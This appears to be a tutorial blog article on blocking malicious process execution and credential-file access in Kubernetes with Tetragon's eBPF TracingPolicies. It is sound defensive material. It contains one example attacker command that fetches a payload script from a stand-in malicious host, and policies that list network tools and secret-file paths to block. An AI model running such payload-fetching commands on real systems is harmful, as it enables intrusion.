Securing Kubernetes at Runtime: Real-Time Enforcement with eBPF and Tetragon

Beyond Passive Monitoring: The Case for Runtime Enforcement

For years, the standard approach to Kubernetes security has followed a familiar pattern: scan images in the CI/CD pipeline, harden configurations using OPA or Kyverno, and monitor logs for suspicious activity. While 'shifting left' is essential, it assumes that we can predict every vulnerability and that our configurations are foolproof. The reality is that zero-day exploits, supply chain attacks, and sophisticated lateral movement often happen in the 'runtime'—the period after a container has successfully passed all checks and is running in production.

Traditional runtime security tools often rely on sidecars or ptrace-based debugging, which introduce significant performance overhead and can be bypassed by sophisticated attackers. More importantly, most of these tools are reactive; they generate an alert after a malicious script has already executed or a sensitive file has been exfiltrated.

To achieve true resilience, we need to move from detection to real-time enforcement. This is where eBPF (Extended Berkeley Packet Filter) and Tetragon come into play. By operating at the kernel level, we can stop malicious actions before they complete, rather than just writing a post-mortem about them.

Why eBPF is the Foundation of Modern Security

eBPF has fundamentally changed how we observe and secure the Linux kernel. In simple terms, eBPF allows us to run sandboxed, verifier-checked programs within the kernel without changing kernel source code or loading kernel modules.

From a security perspective, eBPF provides deep visibility into system calls (syscalls), network packets, and file operations. Because these hooks run inside the kernel, below every user-space application, they are very difficult to evade from within a container. If a process wants to open a socket, execute a binary, or read /etc/shadow, it must go through the kernel. eBPF programs attach to these execution points, allowing us to inspect the context and, crucially, decide whether to allow the action to proceed.

Introducing Tetragon

Tetragon is an open-source project from the Cilium community designed specifically for eBPF-based security observability and runtime enforcement. While tools like Falco are excellent at detecting and alerting on events, Tetragon’s superpower is its ability to perform in-kernel filtering and enforcement.

Instead of sending every event to a user-space daemon to decide what to do (which introduces latency), Tetragon can be configured to take action directly in the kernel. This enables the Sigkill action: terminating a process the moment it attempts an unauthorized action, such as executing curl in a production pod where it doesn't belong.

Core Components of Tetragon

The Tetragon Agent: Runs as a DaemonSet on every node in your Kubernetes cluster.
eBPF Programs: These are loaded by the agent into the kernel to monitor specific hooks (kprobes, tracepoints, LSM hooks).
TracingPolicy: A custom resource, backed by a Custom Resource Definition (CRD), that allows you to define what to monitor and what actions to take using standard Kubernetes YAML syntax.

Practical Implementation: Blocking Malicious Execution

Let’s walk through a real-world scenario. Suppose you have a microservice that should never need to use network tools like curl, wget, or netcat. If an attacker gains shell access via an RCE (Remote Code Execution) vulnerability, their first step is usually to download a second-stage payload using one of these tools.

Step 1: Installing Tetragon

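Installing Tetragon is straightforward via Helm. The commands below follow the upstream quick start and install it into the kube-system namespace, which is also where the later kubectl commands in this article look for it:

helm repo add cilium https://helm.cilium.io
helm repo update
helm install tetragon cilium/tetragon -n kube-system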

Once running, Tetragon immediately begins auditing process executions, which you can observe by tailing the logs of the Tetragon pods or using the tetra CLI tool.

Step 2: Defining an Enforcement Policy

To move from auditing to enforcement, we define a TracingPolicy. The following policy targets pods with the label app: secure-api and prevents the execution of /usr/bin/curl.

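apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "block-curl-execution"
spec:
  # Apply the policy only to pods labeled app=secure-api
  podSelector:
    matchLabels:
      app: "secure-api"
  kprobes:
  # Kernel function that invokes the bprm_check_security LSM hook
  - call: "security_bprm_check"
    syscall: false
    args:
    - index: 0
      type: "linux_binprm"
    selectors:
    # Match the path of the binary that is about to be executed
    - matchArgs:
      - index: 0
        operator: "Equal"
        values:
        - "/usr/bin/curl"
      matchActions:
      - action: Sigkill

How This Policy Works

Hook Point: We attach a kprobe to security_bprm_check, the kernel function that invokes the bprm_check_security Linux Security Module (LSM) hook right before a new program is executed.
Pod Selector: The podSelector restricts the policy to pods labeled app: secure-api.
Selectors: We match on the first argument (the linux_binprm structure), which Tetragon resolves to the path of the binary being executed, and compare it with /usr/bin/curl. matchBinaries is not used here because it filters on the binary of the calling process (for example, the shell), not on the program being launched.
Action: Instead of just logging, we specify Sigkill. The kernel sends SIGKILL to the process that called exec, so curl is terminated before it can do any work.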

When an attacker tries to run curl http://malicious-site.com/exploit.sh, the process will be terminated instantly. To the attacker, it looks like the command simply failed to start; to the administrator, a structured JSON log entry is generated detailing exactly who, where, and when the violation occurred.
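The scenario above also mentions wget and netcat. As a minimal sketch, the same hook can cover several tools by listing more than one value in the selector. The policy name and the binary paths are assumptions for illustration; the actual locations depend on the base image, so check them before relying on this.

```yaml
# Sketch only: extends the single-binary idea to several network tools.
# The name and the binary paths are assumptions; verify them in your images.
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "block-network-tools"     # hypothetical name
spec:
  podSelector:
    matchLabels:
      app: "secure-api"
  kprobes:
  - call: "security_bprm_check"
    syscall: false
    args:
    - index: 0
      type: "linux_binprm"        # resolved to the path of the binary being executed
    selectors:
    - matchArgs:
      - index: 0
        operator: "Equal"
        values:                   # a match on any one value triggers the action
        - "/usr/bin/curl"
        - "/usr/bin/wget"
        - "/usr/bin/nc"
      matchActions:
      - action: Sigkill
```

An exact-path match is easy to reason about, but it will not catch a copy of the tool placed somewhere else in the filesystem, so it works best alongside read-only root filesystems or minimal images.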

Deep Dive: Restricting File Access

Execution isn't the only thing we should monitor. Unauthorized access to sensitive files—like Kubernetes ServiceAccount tokens or /etc/shadow—is a hallmark of container escape attempts.

We can use Tetragon to monitor and block access to specific file paths. Consider this policy that blocks any process from reading the service account token unless it is the authorized application process:

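apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "protect-service-account-tokens"
spec:
  kprobes:
  - call: "fd_install"
    syscall: false
    args:
    - index: 1
      type: "file"
    selectors:
    # Exempt the authorized application; this path is a placeholder
    - matchBinaries:
      - operator: "NotIn"
        values:
        - "/usr/local/bin/my-app"
      matchArgs:
      - index: 1
        operator: "Prefix"
        values:
        - "/var/run/secrets/kubernetes.io/serviceaccount/token"
      matchActions:
      - action: Sigkill

By hooking into fd_install (the kernel function that installs a newly opened file into the process's file descriptor table), we catch the token file as it is opened and kill the process before it can use the descriptor. The matchBinaries selector with the NotIn operator exempts the authorized application, so only other processes are killed. One caveat: the kernel reports the resolved path. /var/run is commonly a symlink to /run, and projected tokens usually sit behind a symlinked ..data directory, so confirm the path that actually appears in Tetragon's events before relying on this prefix.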
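The other sensitive file mentioned above, /etc/shadow, can be watched in a similar way. The following is a sketch rather than a recommended production policy: it hooks security_file_permission, filters on read access, and only emits events. The policy name is hypothetical.

```yaml
# Sketch only: observe reads of /etc/shadow without enforcing anything.
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "observe-shadow-reads"    # hypothetical name
spec:
  kprobes:
  - call: "security_file_permission"
    syscall: false
    args:
    - index: 0
      type: "file"                # struct file *, resolved to a path
    - index: 1
      type: "int"                 # access mask: 4 = MAY_READ, 2 = MAY_WRITE
    selectors:
    - matchArgs:
      - index: 0
        operator: "Equal"
        values:
        - "/etc/shadow"
      - index: 1
        operator: "Equal"
        values:
        - "4"                     # MAY_READ
      matchActions:
      - action: Post              # emit an event only, no enforcement
```

Starting with an event-only policy like this shows which processes legitimately touch the file before any Sigkill action is considered.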

Observability: The 'tetra' CLI

While YAML defines the rules, the tetra CLI provides the visibility. It allows you to see the real-time stream of events in a human-readable format. For example, to see all process executions across the cluster:

kubectl logs -n kube-system -l app.kubernetes.io/name=tetragon -c export-stdout -f | tetra getevents -o compact

This visibility is crucial during the initial rollout. Run each policy in an audit-style configuration first (the same selectors, but without the Sigkill action) for several days to establish a baseline of legitimate behavior before switching to enforcement.
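As a sketch of what such an audit-style policy could look like, the curl rule can be written with the Post action in place of Sigkill, so matches are reported but nothing is killed. The policy name is hypothetical, and the label and path are the ones assumed earlier in this article.

```yaml
# Sketch only: audit variant of the curl rule; reports matches, kills nothing.
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "audit-curl-execution"    # hypothetical name
spec:
  podSelector:
    matchLabels:
      app: "secure-api"
  kprobes:
  - call: "security_bprm_check"
    syscall: false
    args:
    - index: 0
      type: "linux_binprm"
    selectors:
    - matchArgs:
      - index: 0
        operator: "Equal"
        values:
        - "/usr/bin/curl"
      matchActions:
      - action: Post              # swap for Sigkill once the baseline looks clean
```

Because only the action differs, moving to enforcement later is a one-line change, which keeps the audited and enforced rules from drifting apart.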

Performance and Operational Considerations

One of the most frequent questions regarding runtime security is the performance hit. Traditional tools that use ptrace or user-space filtering can see overhead on the order of 10% to 30%, depending on the workload, because every intercepted system call requires a round trip between kernel-space and user-space.

Because Tetragon does the filtering in the kernel using eBPF, the overhead is usually small, often in the 1-2% range, though it depends on which hooks you attach and how often they fire. The kernel only sends data to the user-space agent when a policy match occurs, drastically reducing the volume of data crossing the kernel/user-space boundary.

However, there are trade-offs to consider:

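Kernel Version Requirements: eBPF features are tied to the Linux kernel version. Attaching eBPF programs directly to LSM hooks (BPF LSM) generally requires a modern kernel (5.7 or newer) with that feature enabled; the kprobe-based policies shown in this article do not depend on BPF LSM itself. Most managed Kubernetes services (GKE, EKS, AKS) now provide nodes with sufficiently recent kernels, but verify this for your node images.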
Complexity of Rules: Writing eBPF tracing policies requires a deeper understanding of Linux internals than writing standard K8s Network Policies. You need to know which kernel functions (kprobes) correspond to the actions you want to restrict.
Blast Radius: A poorly written policy with a Sigkill action could accidentally take down legitimate production services. Rigorous testing in staging is non-negotiable.
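One way to limit the blast radius while testing is to scope a policy to a single namespace. The sketch below uses the TracingPolicyNamespaced kind and assumes a namespace called staging; both that namespace and the policy name are hypothetical.

```yaml
# Sketch only: the curl rule confined to one namespace for testing.
# The namespace and policy name are assumptions for illustration.
apiVersion: cilium.io/v1alpha1
kind: TracingPolicyNamespaced
metadata:
  name: "block-curl-staging"      # hypothetical name
  namespace: "staging"            # policy applies only to pods in this namespace
spec:
  kprobes:
  - call: "security_bprm_check"
    syscall: false
    args:
    - index: 0
      type: "linux_binprm"
    selectors:
    - matchArgs:
      - index: 0
        operator: "Equal"
        values:
        - "/usr/bin/curl"
      matchActions:
      - action: Sigkill
```

Keeping enforcement namespaced during testing means a mistaken selector can only affect staging workloads, not every pod in the cluster.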

Tetragon vs. Falco: Choosing the Right Tool

It is common to compare Tetragon with Falco, the CNCF graduated project.

Falco is primarily a detection engine. It excels at complex rule sets and has a vast library of pre-built macros for detecting common attack patterns. It is fantastic for compliance and auditing.
Tetragon is an enforcement engine. While it provides excellent observability, its primary value proposition is the ability to stop the attack in its tracks at the kernel level.

In many high-security environments, engineers use both: Falco for broad-spectrum detection and alerting, and Tetragon for surgical, high-confidence enforcement of critical boundaries.

Conclusion: Your Action Plan

Runtime security is no longer an optional layer for organizations running sensitive workloads in Kubernetes. Relying solely on static analysis leaves a gap that attackers are more than happy to exploit. By leveraging eBPF and Tetragon, you can implement a "Zero Trust" model at the process level.

To get started, follow these three steps:

Deploy Tetragon in Audit Mode: Install the agent and monitor the default events to understand the normal process lifecycle of your applications.
Identify High-Risk Binaries: Determine which tools (like curl, apt, capsh) are present in your images but should never be executed in production.
Implement Incremental Enforcement: Start by applying Sigkill policies to non-critical internal tools in a staging environment, then gradually roll out to production once you have verified there are no false positives.

By moving enforcement into the kernel, you aren't just watching your cluster—you're actively defending it.